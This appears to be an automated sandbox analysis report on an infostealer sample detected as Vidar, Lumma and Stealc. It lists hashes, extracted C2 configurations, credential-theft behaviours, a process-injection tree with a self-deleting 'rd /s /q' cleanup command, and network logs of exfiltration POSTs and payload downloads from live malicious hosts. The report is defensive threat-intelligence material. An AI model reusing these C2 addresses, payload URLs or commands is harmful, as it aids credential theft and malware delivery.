Analysis
-
max time kernel
93s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2024 10:39
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20240802-en
General
-
Target
file.exe
-
Size
404KB
-
MD5
24ee596bc8112bf2fb1a2bb592de5f48
-
SHA1
b68b950551a71f04e1ecdda894ce35b7702a18c2
-
SHA256
605f0e1ad907d5585d5a3ad94244e5ee606e0a16ef99ae51b1557c8ccbaab901
-
SHA512
e6f5dd23b0ca48e871a1193b1cf46b011aab00a051db109c64d8ac38176bbd2b176ddaefbd47df17cd59f76529ea4c997cb11edb2ff47fe5fd3a5f92b1edc512
-
SSDEEP
12288:rX25ztpOkX88ZnbKnBVRYRzv3UcwtfDWXBcJ45G35UEO:TC6s889Yr0D3UcqWXBwWy5Ut
Malware Config
Extracted
vidar
11
486564c74cdd6745c0139d65a01027e6
https://t.me/jamsemlg
https://steamcommunity.com/profiles/76561199780418869
https://t.me/ae5ed
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Extracted
lumma
Extracted
vidar
11
a669a86f8433a1e88901711c0f772c97
https://t.me/jamsemlg
https://steamcommunity.com/profiles/76561199780418869
https://t.me/ae5ed
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Extracted
stealc
default
http://46.8.231.109
-
url_path
/c4754d4f680ead72.php
Extracted
lumma
https://possiwreeste.site/api
https://underlinemdsj.site/api
https://chaptermusu.store/api
Signatures
-
Detect Vidar Stealer 20 IoCs
resource yara_rule behavioral2/memory/532-3-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-8-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-6-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-12-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-13-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-30-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-31-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-47-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-48-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-78-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-80-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-87-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/532-88-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/2556-127-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/2556-131-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/2556-130-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/2556-207-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/2556-208-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/2556-224-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/2556-232-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Executes dropped EXE 4 IoCs
pid Process 4724 AAEHDAAKEH.exe 3064 CAKKKFBFID.exe 4024 HJDGCGDBGC.exe 1932 AdminFCAAEBFHJJ.exe -
Loads dropped DLL 4 IoCs
pid Process 532 RegAsm.exe 532 RegAsm.exe 5040 RegAsm.exe 5040 RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 5088 set thread context of 532 5088 file.exe 83 PID 4724 set thread context of 1944 4724 AAEHDAAKEH.exe 91 PID 3064 set thread context of 2556 3064 CAKKKFBFID.exe 95 PID 4024 set thread context of 5040 4024 HJDGCGDBGC.exe 101 PID 1932 set thread context of 2660 1932 AdminFCAAEBFHJJ.exe 113 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HJDGCGDBGC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AdminFCAAEBFHJJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AAEHDAAKEH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CAKKKFBFID.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3456 timeout.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 532 RegAsm.exe 532 RegAsm.exe 532 RegAsm.exe 532 RegAsm.exe 532 RegAsm.exe 532 RegAsm.exe 532 RegAsm.exe 532 RegAsm.exe 5040 RegAsm.exe 5040 RegAsm.exe 2556 RegAsm.exe 2556 RegAsm.exe 2556 RegAsm.exe 2556 RegAsm.exe 5040 RegAsm.exe 5040 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 5088 wrote to memory of 532 5088 file.exe 83 PID 532 wrote to memory of 4724 532 RegAsm.exe 88 PID 532 wrote to memory of 4724 532 RegAsm.exe 88 PID 532 wrote to memory of 4724 532 RegAsm.exe 88 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 4724 wrote to memory of 1944 4724 AAEHDAAKEH.exe 91 PID 532 wrote to memory of 3064 532 RegAsm.exe 92 PID 532 wrote to memory of 3064 532 RegAsm.exe 92 PID 532 wrote to memory of 3064 532 RegAsm.exe 92 PID 3064 wrote to memory of 400 3064 CAKKKFBFID.exe 94 PID 3064 wrote to memory of 400 3064 CAKKKFBFID.exe 94 PID 3064 wrote to memory of 400 3064 CAKKKFBFID.exe 94 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 3064 wrote to memory of 2556 3064 CAKKKFBFID.exe 95 PID 532 wrote to memory of 4024 532 RegAsm.exe 97 PID 532 wrote to memory of 4024 532 RegAsm.exe 97 PID 532 wrote to memory of 4024 532 RegAsm.exe 97 PID 4024 wrote to memory of 3320 4024 HJDGCGDBGC.exe 99 PID 4024 wrote to memory of 3320 4024 HJDGCGDBGC.exe 99 PID 4024 wrote to memory of 3320 4024 HJDGCGDBGC.exe 99 PID 4024 wrote to memory of 3344 4024 HJDGCGDBGC.exe 100 PID 4024 wrote to memory of 3344 4024 HJDGCGDBGC.exe 100 PID 4024 wrote to memory of 3344 4024 HJDGCGDBGC.exe 100 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 4024 wrote to memory of 5040 4024 HJDGCGDBGC.exe 101 PID 532 wrote to memory of 4324 532 RegAsm.exe 102 PID 532 wrote to memory of 4324 532 RegAsm.exe 102 PID 532 wrote to memory of 4324 532 RegAsm.exe 102 PID 4324 wrote to memory of 3456 4324 cmd.exe 104 PID 4324 wrote to memory of 3456 4324 cmd.exe 104 PID 4324 wrote to memory of 3456 4324 cmd.exe 104 PID 5040 wrote to memory of 4468 5040 RegAsm.exe 107 PID 5040 wrote to memory of 4468 5040 RegAsm.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:532 -
C:\ProgramData\AAEHDAAKEH.exe"C:\ProgramData\AAEHDAAKEH.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1944
-
-
-
C:\ProgramData\CAKKKFBFID.exe"C:\ProgramData\CAKKKFBFID.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:400
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2556
-
-
-
C:\ProgramData\HJDGCGDBGC.exe"C:\ProgramData\HJDGCGDBGC.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:3320
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:3344
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminFCAAEBFHJJ.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4468
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminFCAAEBFHJJ.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3596 -
C:\Users\AdminFCAAEBFHJJ.exe"C:\Users\AdminFCAAEBFHJJ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- System Location Discovery: System Language Discovery
PID:2660
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKEGHDGHCGHD" & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\SysWOW64\timeout.exetimeout /t 104⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3456
-
-
-
Network
-
Remote address:8.8.8.8:53Requestt.meIN AResponset.meIN A149.154.167.99
-
Remote address:8.8.8.8:53Requestt.meIN A
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTRResponse
-
Remote address:149.154.167.99:443RequestGET /jamsemlg HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12382
Connection: keep-alive
Set-Cookie: stel_ssid=a24a0cfbc4f6be6b71_11082954543017583655; expires=Tue, 01 Oct 2024 10:39:10 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
-
Remote address:8.8.8.8:53Request99.167.154.149.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request99.167.154.149.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Requesturusvisa.comIN AResponseurusvisa.comIN A5.42.101.62
-
Remote address:5.42.101.62:80RequestGET / HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC
Host: urusvisa.com
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC
Host: urusvisa.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
Host: urusvisa.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAK
Host: urusvisa.com
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKJJEBKKEHJDGCBGCFCG
Host: urusvisa.com
Content-Length: 4561
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request62.101.42.5.in-addr.arpaIN PTRResponse62.101.42.5.in-addr.arpaIN PTRtorpid-juiceaezanetwork
-
Remote address:8.8.8.8:53Request22.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:5.42.101.62:80RequestGET /sql.dll HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:14 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT
Connection: keep-alive
ETag: "6560a86a-258600"
Accept-Ranges: bytes
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
Host: urusvisa.com
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDH
Host: urusvisa.com
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestGET /freebl3.dll HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:17 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: keep-alive
ETag: "6315a9f4-a7550"
Accept-Ranges: bytes
-
Remote address:5.42.101.62:80RequestGET /mozglue.dll HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:17 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: keep-alive
ETag: "6315a9f4-94750"
Accept-Ranges: bytes
-
Remote address:5.42.101.62:80RequestGET /msvcp140.dll HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:17 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: keep-alive
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes
-
Remote address:5.42.101.62:80RequestGET /softokn3.dll HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:17 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: keep-alive
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes
-
Remote address:5.42.101.62:80RequestGET /vcruntime140.dll HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:17 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: keep-alive
ETag: "6315a9f4-13bf0"
Accept-Ranges: bytes
-
Remote address:5.42.101.62:80RequestGET /nss3.dll HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:17 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: keep-alive
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH
Host: urusvisa.com
Content-Length: 1025
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
Host: urusvisa.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
Host: urusvisa.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
Host: urusvisa.com
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI
Host: urusvisa.com
Content-Length: 111897
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA
Host: urusvisa.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
Host: urusvisa.com
Content-Length: 499
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
Host: urusvisa.com
Content-Length: 499
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH
Host: urusvisa.com
Content-Length: 499
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
Host: urusvisa.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestfiles.veritas.org.ngIN AResponsefiles.veritas.org.ngIN A147.45.44.104
-
Remote address:147.45.44.104:80RequestGET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1
Host: files.veritas.org.ng
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:22 GMT
Content-Type: application/octet-stream
Content-Length: 380456
Last-Modified: Mon, 30 Sep 2024 04:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66fa2b04-5ce28"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
-
Remote address:147.45.44.104:80RequestGET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1
Host: files.veritas.org.ng
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:24 GMT
Content-Type: application/octet-stream
Content-Length: 414248
Last-Modified: Mon, 30 Sep 2024 04:37:16 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66fa2afc-65228"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
-
Remote address:147.45.44.104:80RequestGET /ldms/66fa2ae906657_snd.exe HTTP/1.1
Host: files.veritas.org.ng
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:25 GMT
Content-Type: application/octet-stream
Content-Length: 334376
Last-Modified: Mon, 30 Sep 2024 04:36:57 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66fa2ae9-51a28"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request58.55.71.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request104.44.45.147.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestpossiwreeste.siteIN AResponsepossiwreeste.siteIN A172.67.205.129possiwreeste.siteIN A104.21.22.157
-
